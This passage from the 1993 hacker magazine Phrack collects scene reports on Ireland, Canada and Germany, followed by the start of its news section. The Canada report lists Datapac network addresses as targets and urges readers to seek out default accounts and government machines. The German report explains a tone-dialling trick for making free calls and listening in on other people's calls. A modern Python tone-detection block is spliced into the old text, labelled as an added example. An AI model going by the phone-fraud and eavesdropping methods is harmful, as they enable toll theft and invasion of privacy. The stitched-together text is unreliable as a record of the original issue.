One of the things we really like doing is just exploring, hopping from one network to the next, using computers in such awed places as the U.S., Canada or Mexico, this is probably because for us, even to reach such computers and networks is an achievement, that our Little Brother would deny us had he his evil ways. We think that the Internet is one of the greatest creations in a long time, and we would never want to do any malicious damage on such a free association -if only our Little Brother would let us associate freely with it, instead of making life just that little bit more difficult. We find Sprintnet and other connected goodies interesting prowling grounds, although we are the first to admit that we still have very much to learn here. To explore these systems is very interesting for us, because they are so far away and in such interesting lands that we may never see ourselves -what to you might be the old U.S., to explore the nets there gives us a sense of excitement and a variety of systems that cannot be found on such a small island as our own Ireland. And of course, there is the never-ending quest for U.S. outdials in the hope that one day we might actually reach some of the fabled U.S. h/p boards and actually meet a real Fed or two. *snicker* Turning from the strictly hacking scene for the moment there are some Irish people interested in the phones and other phun things -a while back two college guys were busted for cracking an eleven digit code on some new phone system chip or something, which had given them unlimited dialling access and other phun privileges. -then there was the magic toll free number which for a month or two gave the Irish population unlimited access to the outside world (a big thank-you goes to whoever worked that one out. 
*grin*)

I'm told from reliable sources that we have a pretty sophisticated phone system, a matter we soon hope to be investigating, but this does not seem to have stopped phreakers from trying, and if we manage to work anything out, we'll, as our 'Telecom Eireann' so aptly put it 'Keep in touch across the world'.

Sadly, we are plagued by outrageous phone charges, even for local calls and hence many Irish boards have failed to blossom -of those that do, the sysops seem to be little interested in h/p talk and I know of no dedicated h/p Irish board.

There also used to be a type of Underground meeting that occurred every dark rainy Sunday afternoon, down in the Ormond, a hotel in Dublin city centre. It passed unheeded under the guise of a computer club, but the bloke who ran it was a renowned con-man, and dealer of everything and anything from car radios to Rolex watches -in any event the club must have been one of the biggest WareZ swapping centres, including all the latest videos from the U.S. which would not be released in the cinemas (movies) here until six months later. Generally people interested in the same computer type things just got together to chat and swap the latest news, disks and videos -an interesting place with interesting folks, which sadly no longer seems to happen. Perhaps someone will revive something similar in the near future.

Well, I'll end the tale there for the moment. Hopefully you've gotten a little flavor of our little Underground, watched over by our Little Brother, in our little country called Ireland. I'm not sure how I ended up writing this article, but since nobody else stepped forward, I thought Ireland should at least get some kind of mention, if nothing else -so you can /dev/null any flames.

Before I sign off, I'd just like to thank Phrack not only for giving me the chance to tell my tale, but for supplying us with a great publication and guide to the Underground.
Finally, if you are an Irish hacker/phreaker, then get in touch now!!! -I really want to be able to say that I can count the number of Irish hackers I know on two hands, and not just one, before the end of the decade! Also, I am always interested in talking to anyone interested in the hack/phreak world so get in touch if you want to chat -just remember, we are no elite! (I don't suppose anyone out there, knows anything about the Irish phone system? *shrugs*)

Ok, I can be reached at the following, for the next little while: (Yes, I do have Irish a/c's but not for thine eyes...)

al575@yfn.ysu.edu
hawkwind@m-net.ann-arbor.mi.us
hawkwin@santafe.edu (note: no 'd' at end userid)

I'm also sometimes on IRC, and may hopefully be on phantom soon.

Well, as we say in Ireland, good luck and may the road rise up before you.

Slan Leat,
Hawkwind.

*****************************************************************************

Canada

All is Quiet on the Northern Front

Written and compiled by Synapse

Welcome to the barren wastes or rather the undeveloped wastes if you will. Welcome to Canada. A realm seldom traveled and less often explored. Canada, or .ca if you will, is virgin country in the net. There are places that have been sitting idle for years on our nets that still have default accounts in use. There is an unmeasurable amount of data out there waiting to be tapped. The possibilities in this are endless, Canada is untouched for the most part, and as developed networks go, I feel that Canada is as close to The 'Undiscovered country' as you can get.

Most likely if you are reading this article you will be of a nationality other than Canadian. If so, perhaps this will be an educational experience for you. To explain our nets and our scene here in the far far north, I must first explain our nation and its greatest difficulty, it has NO identity, therefore it tends to mirror those it is enamored with.
Hence our scene resembles an amalgamation of whatever seems popular in the nets at a given time. Most often it attempts somewhat miserably to emulate the scene south of our border, the great U S of A. And in short it fails miserably.

This is not to say that Canada does not have a scene of its own nor is it attempting to take away from those scenes that have developed fully on their own within .ca. It is simply bringing to light a problem that plagues our scene and dilutes it for those who are serious about the computer underground, and whatever ideals it may contain.

If you travel the nets in Canada you will find that dissent and "ElYtEeGoStRoKInG" are staple with both the Hacking and Warez scenes all throughout the nine provinces and 2 territories. As I am sure you know this is not a problem unique to .ca. However in a scene as minute and spread painfully thin as ours, arrogance and mis-communication can be fatal in the way of cooperation gaps. This has proved the case many times in the recent past, and I am sure it will in the near future as well.

Canada seems to have a communication barrier that separates east from west. There is simply close to no communications between the two. It is as if we are in separate hemispheres and lost to the technology of fiber optics and damned to smoke signals and drum beating. I have to wonder sometimes if both sides are so involved in their own local power struggles, that the rest of the world has melted away including their countrymen on either side.

Alas it is time to dive into this the this of the article. To detail the complete underground in Canada would be impossible for me to do, to even give a non-biased view would be impossible. So if you feel that this is simply an overextended opinion, thank IBM for the PgDn key and spare yourself some opinionated text.
The Almost LODs of .ca

Just like the U.S., Canada is proliferated with umpteen amounts of upstart groups who after reading some trashy second rate book on LOD or Kevin Mitnick, have decided that they have found what it is to be elyte. Most often these will be the prominent voices on underground boards spitting flame and stroking immeasurably unhealthy egos, and boasting how proficient they are with toneloc and Killer Cracker. However as with most boasts put forth by fourteen year olds, nothing comes of it.

However if you can manage passage through the quagmire of shit that serves as the .ca scene, then you will most likely encounter some of .ca's more serious minded types who while retaining talent and a penchant for learning, do not sport an ego of astronomical proportions, and wit that would bring condescension from an ant.

The following is a short list of several of .ca's more prominent if not more talented groups.

RaBID
The Virus People

If the Virus world is your environment, then most likely you have stumbled across the work of RaBID, hopefully not on the receiving end.. Rabid is based out of 416 or rather Toronto Canada, at its prime Rabid was running a mail net that spanned Canada and were releasing enough material to employ the boys at McAfee. Things have changed.

While Rabid had at one point been a productive group (if you can call a virus group productive) time seems to have worn their edge, in fact Rabid as a group have failed to release anything of value in a great long time. Perhaps this will change. If nothing else Rabid did bring a much needed ego boost to the Canadian scene, in doing so they opened the door for other such groups to be seen on the international level without being laughed out of the nets. For this if nothing else they deserve recognition.
There is a great deal more to be said about Rabid, however as I said all the information given here will be cursory, if you require any information at all in the future on Rabid or any of the groups mentioned below I will leave an e-mail address below where you can write me, I will help you if I can.

FOG
out of 403 Calgary, Alberta

No scene is complete without talented juveniles given to temper tantrums, virus spreading and general malicious behavior.. Enter FOG. FOG stands for the Fist Of God, it is for the most part a group of individuals who go through unnatural amounts of effort to get under the skin of others. Yet beyond juvenile behavior that tends to underscore most endeavors they undertake, FOG does for the most part work very diligently for a united .ca scene. They have in the past run a nation wide net using encrypted mail procedures so that dialogue could be opened between the east and western scenes. This event was stopped when the Hub's house was raided by the Royal Canadian Mounted Police for suspected telco abuse, there were no charges laid however yet the organizers felt that the information passing through the net was much too valuable to be compromised by a bust. The net was killed.

After the net disappeared several members of FoG began writing bbs software to be spread across the country to make networking easier or rather standardized. The bbs also includes encryption options for the mail, and will soon be HAM radio as well as cellular modem capable. This program is available to any who wish to take it, as I said earlier, just mail me.

NuKE
Making Art out of Arrogance

NuKE hails from 516 Montreal, Canada. It is, as far as I can see, primarily now a virus group. Producing and modifying strains, for the most part NuKE has been the most active underground .ca group that has seen movement on an international level, with this past year. Its membership has changed quite severely since I last had contact with them.
Therefore I fear that to publish anything else on them would be inaccurate and therefore an injustice. However if you are interested in pursuing this topic........Mail me.

As you can see these are cursory overviews of Canada's groups; it is of course largely incomplete, I provided it only to serve as a guide for the feeling of Canada's groups. There are of course many worth mentioning that I failed to show, and moreover there is a great deal more to the groups that I did mention. To those who are in the above groups and are unhappy with the opinion put forth please by all means FUCKOFF. I e-mailed all of you, and in your infallible wisdom you failed to reply. So suffer with it :>

.ca and the law

While Canada has been for the most part largely un-abused by the 'Computer Criminal', its laws are none the less fairly advanced. Our legislators to their credit have kept a close eye on our neighbors in the south, and have introduced laws accordingly. The following is the Canadian criminal code as pertaining to Computer Crime.

342.1 (1) Every one who, fraudulently and without color of right,

    (a) obtains, directly or indirectly, any computer service,

    (b) by means of an electro-magnetic, acoustic, mechanical or other device, intercepts or causes to be intercepted, directly or indirectly, any function of a computer system, or,

    (c) uses or causes to be used, directly or indirectly, a computer system with intent to commit an offense under paragraph (a) or (b) or an offense under section 430 in relation to data or a computer system

is guilty of an indictable offence and liable to imprisonment for a term not exceeding ten years, or is guilty of an offence punishable on summary conviction.
(2) In this section,

"computer program" means data representing instructions or statements that, when executed in a computer system, causes the computer to perform a function;

"computer service" includes data processing and the storage or retrieval of data;

"computer system" means a device that, or a group of interconnected or related devices one or more of which,

    (a) contains computer programs or other data, and

    (b) pursuant to computer programs,

        (i) performs logic and control, and

        (ii) may perform any other function;

"data" means representation of information or of concepts that are being prepared or have been prepared in a form suitable for use in a computer system;

"electro-magnetic, acoustic, mechanical or other device" means any device or apparatus that is used or is capable of being used to intercept any function of a computer system, but does not include a hearing aid used to correct subnormal hearing of the user to not better than normal hearing;

"function" includes logic, control, arithmetic, deletion, storage and retrieval and communication of telecommunication to, from or within a computer system;

"intercept" includes listen to or record a function of a computer system, or acquire the substance, meaning or purport thereof.

430. [...]

(1.1) Every one commits mischief who willfully

    (a) destroys or alters data;

    (b) renders data meaningless, useless or ineffective;

    (c) obstructs, interrupts or interferes with the lawful use of data; or

    (d) obstructs, interrupts or interferes with any person in the lawful use of data or denies access to data to any person who is entitled to access thereto.

[...]

(8) In this section, "data" has the same meaning as in section 342.1.

As you can see our criminal code carries severe penalties for both Hacking and Virus spreading however, there is little precedent to set sentences by. While this is reassuring, there seems to be a new trend to prosecute those who are caught at computer crime.
Moreover it seems to be a trend to prosecute with setting precedence in mind.. So for those of you in .ca who have been busted recently I would begin to fear right about now.

For the most part most computer crime in Canada that results in busts is telco related, most often the charges are federal but the sentences are light, however as I said before, this is changing. And will continue to change with each new bust, welcome to the new dawn I suppose.

Datapac, Canada's first net

As it stands Datapac is Canada's largest and most used network, it is old, archaic and slow, yet still it is immense amounts of fun to play with. The following is a technical excerpt to help you understand the operation of Datapac and how to maneuver it. Those of you who are already familiar with the workings of this type of network will find this dry and repetitive; for those of you who are not familiar it may make for some learning. After the manual entry you will find a list of interesting sites to explore with, enjoy....

Datapac 3101
"Welcome to the Dark Ages"

Interface (ITI) in a Packet Assembler/Disassembler (PAD), which allows the devices to access the Network over dial-up (DDD) or Dedicated Access Lines.

ITI, the end-to-end protocol for Datapac 3101, conforms to the CCITT recommendations X.3, X.28 and X.29 and supports access to the Datapac Network for asynchronous, start-stop character mode terminals.

X.3 specifies the operation of the PAD. It contains the specifications for the twenty-two International parameters and their operation.

X.28 specifies the command language between the terminal and the PAD. It also specifies the conditions which define the command mode and the data transfer mode.

X.29 specifies the procedures to be followed by an X.25 DTE to access and modify the parameters in the PAD as well as the data transfer procedure.

The Datapac 3101 service provides for terminal to Host (user's computer) and terminal to terminal communication.
The Host access should conform with the X.25 protocol, using the Datapac 3000 access service, and also support the higher level protocol conventions for ITI. Host access may also be provided via the Datapac 3101 service for some applications. The Datapac 3101 service also provides block mode and tape support.

INTERNATIONAL PAD PARAMETERS
----------------------------

1) Ability to Escape from Data Transfer State*

The setting of this parameter allows the user to interrupt the communication of his or her application (data transfer mode) and interact with the PAD (command mode). The character to do this is "ControlJP". To return to data transfer mode, press the carriage return or enter a blank command line. If the user wants to send a "ControlJP" to the Host, with this parameter set to one, simply hit ControlJP twice and the second ControlJP will go to the Host and the user will remain in data transfer mode. This also applies to the user data field in the call request command line.

Parameter Number: 1
Possible Values:  0 = Escape not possible.
                  1 = Escape is possible.

*Note: Escape from Data transfer mode may also be possible using the break signal if parameter seven is set to eight.

2) Echo*

This parameter indicates to the PAD whether or not the terminal input data must be echoed. This may be required if the user's terminal cannot echo back what is being entered.

Parameter Number: 2
Possible Values:  0 = No echo.
                  1 = Echo.

*Note: Echo will also be affected by the setting of Parameter 20.

3) Selection of Data Forwarding Signal

This parameter indicates to the PAD the set of terminal generated characters or conditions that will cause data to be forwarded to the destination. For example, (CR) can be used as a data forwarding signal: on receipt of a (CR) from the local DTE Y, the PAD will forward all characters in its buffer to the remote end, including the (CR). If P13 is set to 6, 7, 22 or 23, a (LF) will be included in the packet and will delimit it.
Data is also forwarded when the buffer is full whether or not a forwarding character is received.

Parameter Number: 3
Possible Values:  0 = No data forwarding signal.
                  2 = Forward on carriage return.
                  2 = Carriage return.
                  126 = All characters in columns 0 and 1 of ASCII table and the character del of International alphabet #5.

4) Selection of Idle Timer Delay

This parameter is used to determine the idle timer limit value when data forwarding is based on timeouts. To optimize packetizing of data, no data forwarding signal need be specified. The PAD will then packetize data based on packet size specified (256 or 128 characters). The idle timer is used to send any packets that are not fully filled. If idle timer is activated and the Host requires the (CR) to input data, it still must be provided before the data send is accepted by the Host. The idle timer does not send any empty packets.

Parameter Number: 4
Possible Values:  0 = No data forwarding on timeout is required.
                  1-255 = Indicates value of the delay in twentieths of a second. (i.e., a value of 250 makes the time wait 10 seconds)

*Note: When editing is on (P15:1), the idle timer is inactive. If this is the only data forwarding condition, turning the editing function on could cause a user terminal to hang or data not to be forwarded.

5) Auxiliary Device Control*

This is used for flow control of data coming from either a PC or auxiliary device, e.g.: a paper tape machine. When set to 1 it indicates to the PAD that the data is to be read from an auxiliary I/O device connected to the terminal. This parameter set to 2 indicates that the data is coming from an intelligent device, i.e., a PC, and that the PAD must exert flow control differently.

Parameter Number: 5
Possible Values:  0 = No use of X-on/X-off.
                  1 = Use of X-on/X-off for auxiliary devices.
                  2 = Use of X-on/X-off for intelligent terminals.

*Note: A value of 2 is recommended for PC's.
6) Suppress Network Messages

This parameter indicates to the PAD whether or not Network generated messages are to be transmitted to the terminal.

Parameter Number: 6
Possible Values:  0 = Suppress message.
                  1 = Transmit message.
                  5 = PAD prompt (*) follows Datapac service signals.

7) Procedure on Break

This parameter is used to indicate how the PAD should process a break signal that is received from the terminal while the terminal is in data transfer state.

Parameter Number: 7
Possible Values:  0 = Nothing. (remain in data transfer mode)
                  1 = Interrupt. (remain in data transfer mode)
                  2 = Reset. (remain in data transfer mode)
                  4 = Send an "indication of break" message to the packet mode DTE. (remain in data transfer mode)
                  8 = Escape from data transfer mode (i.e., enter command mode)
                  16 = Discard output to terminal, activate Parameter 8 (P8:1) (remain in data transfer mode)
                  21 = A combination of 1, 4 and 16.

*Note: The break signal is ignored if the virtual circuit is not established while in command state. The break signal will delete the current line. The valid values for P7 are 0, 1, 2, 8 and 21.

8) Discard Output

This parameter is used in conjunction with Parameter 7. Depending upon the break procedure selected, this parameter may be set by the PAD when the terminal user requests that terminal data be discarded. This parameter must then be reset by the destination computer to allow normal delivery. The PAD will discard all packets destined for the terminal from the time the PAD sets this parameter (i.e., it receives a break signal when Parameter 7 is set to 21) to the time the parameter is reset by the destination. It can only be reset by the destination.

Parameter Number: 8
Possible Values:  0 = Normal delivery of output to terminal.
                  1 = Discard output to terminal.

9) Padding after Carriage Return

This parameter is used to specify the number of padding characters to be inserted by the PAD following a CR transmitted to the terminal.
Padding allows time for the carriage to return on mechanical printing devices.

Parameter Number: 9
Possible Values:  0 = 2 padding characters will be inserted at 110 bps and 4 padding characters will be inserted at higher speeds, in command mode only. (no padding is done in data transfer mode)
                  1-255 = The number of padding characters to be inserted in both data transfer and command mode.

10) Line Folding

This parameter indicates the maximum number of printable characters that can be displayed on the terminal before the PAD must send a format effector (i.e., ). This permits more data to be transmitted in one packet while still letting the user print out more than one line, i.e., printing out forms.

11) Transmission Speed (Read only)

This parameter is set by the PAD as a result of transmission speed detection if the terminal accesses an autobaud port. When a private port with fixed speed is used, this parameter is set based on the pre-stored information selected at subscription time.

Parameter Number: 11
Possible Values:  0 = 110 bps
                  2 = 300 bps
                  3 = 1200 bps
                  4 = 2400 bps

This is all very dry stuff (what buffer isn't?) however if you need more info on it simply mail me.

NUA list

20500011     Bell Northern Research
39400100     Envoy (English/Francais)
30400101     Envoy (Anglais/French)
39500032     Globe and Mail
41100015,I   Infoglobe
59600072     University of Athabasca
60100010     University of Alberta
67100752     ?
67100673     ?
20400177     QL
29400138     Tymnet
             CIS02 7770,101 'free demo'
20401338     Tymnet
41100043     CSG Infoglobe
73500023     KN Computer MCT
59100092     Keyano College (Alberta)
72400014     System Max-Daisey (VAX/VMS)
69100018     Cybershare
55500010     ?
29400263     ?
29400263     ?
67100086     Sears
67100132     Primenet
67100489     Terminal ID=VAX
67100629     (VAX/VMS)
67100632     McKim Advertising (Vancouver)
93200233     University of Manitoba
79400100     Envoy Info/Mailbox
92100086     Datapac General Info
20500011     Canole II

I have kept a number of sites I have, off this list simply to ensure I keep them, however there are thousands of Virgin sites available off of Dpac. Something to keep your eyes open for are Canadian government machines which are fairly abundant on the Dpac.

Beyond Dpac, there are some actual BBS's worth calling, most however would rather not have their numbers published in Phrack. None the less here are some stable, and relatively active BBS's:

The Underground Subway    606-590-1147
Gridpoint                 403-283-5519
The G-spot (Rabid HQ)     416-256-9017
Front 242 (VX)(Rabid)     416-790-6632

I am sorry for what this article did not cover, in the umpteen or so pages I have punched up, I still have covered not even a tenth of what I would like to cover. For those who wish a reliable UG bbs for list .ca or more info on the Dpac or wish to elicit any other response to this article please e-mail me at besaville@sait.ab.ca

*********************************************************************

The German Scene (by SevenUp)
----------------

CCC
---

Talking about the German Hacker Scene, the Chaos Computer Club (CCC) comes to most people's mind. They are most famous for their 'NASA-Hack' and their publications like Hackerbibel and Datenschleuder, a monthly magazine talking about 'softer' stuff than 2600, such as MUD's, the Internet and BBS'es.

They organize the annual Chaos Communication Congress, held annually from December, 27th till 29th in Hamburg. Usually around 1000 people show up there, discussing many different topics, such as Phreaking, Internet, Women and Computer, Cellular Phones, Phone Cards and others. Many well-known people, like Pengo and Professor Brunnstein the meeting.
There are usually also shows of Horror Movies (but no porns like at HohoCon), but it's not a real 'party' like SummerCon or the upcoming Hacktic Party.

Another annual meeting from CCC members and many other hackers is at the huge computer fair 'CeBit' in Hannover in March. The Get Together is at the Telekom booth on Tuesday at 4pm. Usually Telekom (the German phone company) representatives are very kind, give away phone cards (value: $4), but usually don't have any interesting new information.

There haven't been any hacks affiliated with the CCC for the last couple of years. The CCC tries to get away from their former criminal image, talking mostly about risks of computers in society, and producing lots of press releases.

The KGB Hack
------------

Most of you might know "The Cuckoo's Egg" by Cliff Stoll. His exciting novel talks about German Hackers hacking for the KGB. These guys were using the German x.25 network Datex-P to get to a US University, and from there to several hosts on the Arpa/Milnet (Internet). They were using mostly basic knowledge to get into several UNIX and VMS Systems, reading personal Mail and looking for documents the 'Russians' might have been interested in. It all ends up with the suicide (murder?) of Karl Koch, one of the hackers.

Although these hackers weren't CCC members, there is a pretty good book from the CCC about it, containing more facts than Cliff's book: "Hacker fuer Moskau", published by Wunderlich. This is probably the best known German hack of all times.

Networks
--------

I. x.25

The German x.25 System is called 'Datex-P' and has the DNIC (2624). Dialups are in almost every area code, or can be reached locally from everywhere. There are also Tymnet and Sprintnet Dialups available in the major cities, with some limitations though. Tymnet won't connect you to dpac (Datapac Canada).
Sprintnet has just a true dialup in Frankfurt, the other dialups are handled by their partner Info AG, which allow calling most RNUAs, but most Sprintnet NUIs won't work.

There is a 'Subnet' in the Datex-P Network, the so called 'WiN' (which means scientific network). Almost all universities have connections to the WiN, which means they pay a flat rate each month, which allows them to make as many calls and transfer as much data to other WiN hosts, as they like. Usually x.25 rates are charged by the volume of packages/data. You can identify WiN addresses easily, because they start with (0262)45050... There are many gateways from WiN to Internet, and also a few from Internet to WiN. WiN NUAs can be reached without problem from any x.25 network in the world, like Sprintnet or Tymnet; though most WiN PADs will refuse to connect to non-WiN NUAs.

There are also a couple of German systems, international hackers used to like. The most-famous is probably Lutzifer in Hamburg, Germany. It can still be reached from x.25 Networks like Sprintnet or Tymnet. Around two years ago, British, American and other hackers used to trade all kinds of codez on "Lutz". But now, Pat Sisson ("frenchkiss") from Sprintnet Security and Dale Drew ("Bartman") from Tymnet Security, try to track down everyone abusing their NUIs or PADs.

Before Lutzifer went up 2.5 years ago, tchh and Altos Munich were most attractive. They were running the same simple Korn-Chat on an Altos.

There are still a couple of other x.25 Systems, which attract hackers from all over the world, like qsd, Pegasus (in France and Switzerland) and Secret Tectonics / sectec, a rather new semi-private Board in Germany with x.25 and Direct Phone Dialups, uucp/Internet Mail, File and Message Bases and all Phrack Issues as well.

II. Internet

But now, most hackers quit the x.25 scene and tried to get onto Internet.
Unlike the fast Internet connections in the USA between .edu sites, German Internet connections are mostly routed through slow (9.6kbps or 64k) x.25 Links. This is mostly the fault of the German phone company 'Telekom'. They have a monopoly on phone lines in Germany and charge 2-10 times higher fees than American phone co's. Even local calls are US$1.50/hour.

There aren't many German Internet Sites that attract foreign hackers, compared to US Sites that German Hackers are interested in. There are almost no public Internet BBSes with free access in Germany. Also, German Universities have often a pretty tight security and get mad easily.

III. Amiga Kiddos

BBS'es are still the major hang-out besides IRC. The Amiga Scene with its K-rad Kiddos (most of them under 18 years) used to be dominant a couple of years ago, trading Calling Cards and new Blue Box frequencies to call the best boards in the US to leech the latest games. But recently, the IBM scene caught up and many guys switched from Amiga to IBM; so over 50% of pirate boards are IBM boards now.

But recently, BBS sysops have to face hard times. A couple of months ago, lots of BBS'es in Berlin, but also in Bavaria and North Germany got 'busted' - raided by the police because of their illegal warez. (see my article in Phrack 42 about it)

The man behind these actions is the lawyer 'Guenther Freiherr von Gravenreuth', who works for Activision, the SPA and BSA. He is tracking down kids with piracy as recklessly as BBS Sysops, who sell subscriptions for a 'Disabled Upload/Download Ratio' for around $100 a month. There have been a couple of these trials lately, without much notice by the press. Mr Gravenreuth is also responsible for many people's fear to put up a new BBS - especially in Bavaria where he lives.

Also, calling the favorite Board in the US is getting harder and harder, as covered in the next Chapter.

IV. The Phone System

Blueboxing used to be the favorite sport of many German traders for the last couple of years. But some phreakers wanted to make more money, selling the Bluebox Story to Magazines like Capital or Spiegel, or to TV Shows. Even AT&T and the German Telecom, who seemed to be blind about this phreaking, couldn't avoid facing the truth now - they had to do something, not only to recover from the huge losses, but also to save their reputation.

There are a lot of rumors and text files about the actions these phone companies took; most of them are fakes by 'eleet' people, who don't want the 'lamers' to keep the trunks and the eleet boards busy. But some actions seem to be certified; e.g. Telekom bought some intelligent filter boxes from British Telecom. These boxes should detect any C5 tones (especially 2600 Hz), being sent by phreakers; and log the number of the phreaker, if possible. If possible, because the Telekom doesn't have ANI in most cases. Until recently, all phone lines used to be analog, pulse dialing lines with huge relay switches. Then the Telekom started switching to 'modern' digitally switched lines, which allow Touch-Tone-Dialing, and also a few other nice features, which I want to cover now.

One of these nice features 'died' just about 3 weeks ago, because someone informed the new magazine 'Focus'. The trick was very simple. All you need was a digital line which allowed you to dial touch tone, and a 'Silver Box' - a device, that allows you to dial the digits 0...9, #, * and also A, B, C and D - many modems have this capability too. All you had to do was to dial 'B' + 'xxx' + 'yyyy', where 'B' is the Silver Tone B, 'xxx' is an internal Telekom code, and 'yyyy' are the last four digits of a phone number. The internal codes 'xxx' usually look like 010, 223, 011, and so on - they switch you to an exchange, mostly in your own area code, but often in a different one! Notice that exchange number and internal code are different.
When you are connected to a certain exchange, dialing the four 'yyyy' digits connects you to a certain phone number in that exchange. This enables you to make free calls - also to different area codes, but you have to try around to find which code matches with which exchange. But that's not all; now the fun just begins! Imagine the number you dial is busy... you won't hear a busy signal then, you would just be connected into the call! You could listen to the conversation of two parties! Imagine how much fun this could be... and imagine someone would be listening to your private conversations! When Telekom read the article, most area codes lost this capability; but there are still some reported to work.

Blueboxing is getting harder and harder; MCI and AT&T keep on changing their 'Break' frequencies more rapidly (though they still use in-band CCITT C5 signalling); so more and more people offer Calling Card subscriptions, and even more traders, who refuse paying Telekom's high fees, buy them. They are offered mostly by Americans, Belgians and Germans, for about $100 a month. Also, I haven't heard of any case where a German got busted for abusing AT&T's Calling Cards; probably because Telekom can't really trace phone lines, neither technically nor legally (they may not just 'tap' phone lines because of people's privacy).

Also, German Toll Free Numbers (they start with 0130) are becoming more and more numerous. I would take a guess and say they grow 20%-80% a year. There isn't any official directory nor a directory assistance for these numbers, and many companies want these numbers to remain 'unknown' to the evil hackers, since Telekom is asking high fees for them. So many Germans compile and scan these numbers; there is also a semi-public list of them by SLINK - available on many BBS'es and on local German Newsgroups.
This list also contains numbers of business companies like Microsoft, Hewlett Packard or Dell in Austin (hi erik :) ), so it is quite useful for 'normal people' too.

The first PBX-like Systems in Germany have also been reported; this is quite a sensation, because German Telekom laws don't allow PBX'es, or even the linking of two phone lines (like 3-way calling). So in fact, these Systems weren't real PBX'es, but Merial Mail VMB Systems with the Outdial feature.

PaRtY 0n!
---------

There are a couple of interesting get-togethers and parties. I mentioned the annual Chaos Communication Congress after Christmas; the CCC also has weekly meetings on Tuesday. There are the annual CeBIT hacker parties, on the Tuesday at CeBIT in March. After the CeBIT meeting and weekly, there are get-togethers at the 'Bo22', a cafe in Hannover. These meetings have been a tradition since the KGB Hacks of Pengo and 'Hagbard Celine' Karl Koch, as I mentioned above. You will still find friends of them there, if you drop by on a Tuesday.

For a couple of months now, and with Emmanuel Goldstein's great support, we have been having 2600 meetings in Munich, Germany too! These are the first 2600 meetings outside of the US; the first meeting was quite successful with over 30 people, and the next one in July will be successful too, hopefully. Some international visitors from the US are expected, too. These meetings are held at around 6pm in front of Burger King at Central Station, Munich. I would also like to thank Munich's Number One Hit Radio Station 89 HIT FM at this point, for letting us on the air for 3 minutes, talking about the 2600 meeting and a bit about 'hacking'.

There are also semi-annual IRC parties in Germany, but they are 'just' parties with usually 100-150 people. Hacking and phreaking aren't a topic there; probably less than 10% of them know what H/P means.
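The Phone System section above says Telekom's filter boxes are meant to detect in-band C5 tones (especially 2600 Hz) and log the caller where ANI exists. As an added example (not from the article, and not Telekom's or British Telecom's actual design), this shows how such detection can work: a Goertzel filter per 20 ms frame, a purity threshold so ordinary speech does not trigger it, and a minimum duration. The 8 kHz sampling rate, the thresholds, the 2400 Hz companion frequency and all names are assumptions.

```python
import math

# Assumed parameters (none of these come from the article).
SAMPLE_RATE = 8000      # Hz, usual telephony PCM rate
FRAME = 160             # samples per 20 ms analysis frame
# 2600 Hz is the tone the article names; 2400 Hz is the other CCITT No. 5
# line-signalling frequency and is added here.
C5_LINE_TONES = (2400.0, 2600.0)
PURITY = 0.8            # share of frame energy that must be signalling tone
MIN_FRAMES = 3          # tone must persist >= 60 ms to count
MIN_ENERGY = 1e-4       # ignore near-silent frames


def goertzel_power(frame, freq, rate=SAMPLE_RATE):
    """Mean-square power of one frequency in a frame (Goertzel algorithm)."""
    coeff = 2.0 * math.cos(2.0 * math.pi * freq / rate)
    s1 = s2 = 0.0
    for x in frame:
        s0 = x + coeff * s1 - s2
        s2, s1 = s1, s0
    magnitude_sq = s1 * s1 + s2 * s2 - coeff * s1 * s2
    return 2.0 * magnitude_sq / (len(frame) ** 2)


def frame_is_signalling(frame):
    """True when almost all of the frame's energy sits on the C5 line tones."""
    total = sum(x * x for x in frame) / len(frame)
    if total < MIN_ENERGY:
        return False
    tone = sum(goertzel_power(frame, f) for f in C5_LINE_TONES)
    return tone / total >= PURITY


def scan_channel(samples, caller_id=None):
    """Return one log record per sustained in-band signalling tone."""
    events, run_start, run_len = [], 0, 0
    n_frames = len(samples) // FRAME
    for i in range(n_frames + 1):          # extra pass flushes a trailing run
        hit = i < n_frames and frame_is_signalling(
            samples[i * FRAME:(i + 1) * FRAME])
        if hit:
            if run_len == 0:
                run_start = i
            run_len += 1
            continue
        if run_len >= MIN_FRAMES:
            events.append({
                "start_ms": run_start * FRAME * 1000 // SAMPLE_RATE,
                "duration_ms": run_len * FRAME * 1000 // SAMPLE_RATE,
                # Without ANI the box can only record that a tone was seen.
                "caller": caller_id or "unknown (no ANI)",
            })
        run_len = 0
    return events


def synth(freqs, ms, amp=0.3):
    """Constructed test signal: sum of sine waves lasting `ms` milliseconds."""
    n = SAMPLE_RATE * ms // 1000
    return [sum(amp * math.sin(2.0 * math.pi * f * t / SAMPLE_RATE)
                for f in freqs) for t in range(n)]


VOICE = (300.0, 700.0, 1100.0)   # constructed stand-in for speech energy
# Constructed call: voice, 160 ms of 2600 Hz, voice, a 20 ms blip, voice.
CONSTRUCTED_CALL = (synth(VOICE, 200) + synth((2600.0,), 160)
                    + synth(VOICE, 100) + synth((2600.0,), 20)
                    + synth(VOICE, 100))
# Constructed talk-off case: 2600 Hz present but buried in voice energy.
VOICE_WITH_2600 = synth(VOICE + (2600.0,), 200)

if __name__ == "__main__":
    for event in scan_channel(CONSTRUCTED_CALL):
        print(event)
    print(scan_channel(VOICE_WITH_2600))
```

The purity check is what separates a signalling tone from speech that happens to contain energy near 2600 Hz, and the duration check drops the 20 ms blip.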
                              ==Phrack Magazine==

                 Volume Four, Issue Forty-Three, File 27 of 27

              PWN PWN PNW PNW PNW PNW PNW PNW PNW PNW PNW PWN PWN
              PWN                                             PWN
              PWN              Phrack World News              PWN
              PWN                                             PWN
              PWN        Compiled by Datastream Cowboy        PWN
              PWN                                             PWN
              PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN PWN

New Yorker Admits Cracking                                     July 3, 1993
~~~~~~~~~~~~~~~~~~~~~~~~~~
(From AP Newswire Sources)

Twenty-one-year-old Mark Abene of New York, known as "Phiber Optik" in the underground computing community, has pleaded guilty to charges he participated in a group that broke into computers used by phone companies and credit reporting services.

The Reuter News Service says Abene was the last of the five young men indicted in the huge 1991 computer break-in scheme to admit committing the crimes. The group called itself "MOD," an acronym used for "Masters of Disaster" and "Masters of Deception."

Abene pleaded guilty to one count of conspiracy and one count of unlawful access to computers. He faces a possible maximum prison term of 10 years and fine of $500,000.

-----------------------------------------------------------------------------

China Executes Computer Intruder                               April 26, 1993
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
(From AP Newswire Sources)

A man accused of invading a computer and embezzling some $192,000 has been executed in China.

Shi Biao, an accountant at the Agricultural Bank of China's Jilin branch, was accused of forging deposit slips from Aug. 1 to Nov. 18, 1991.

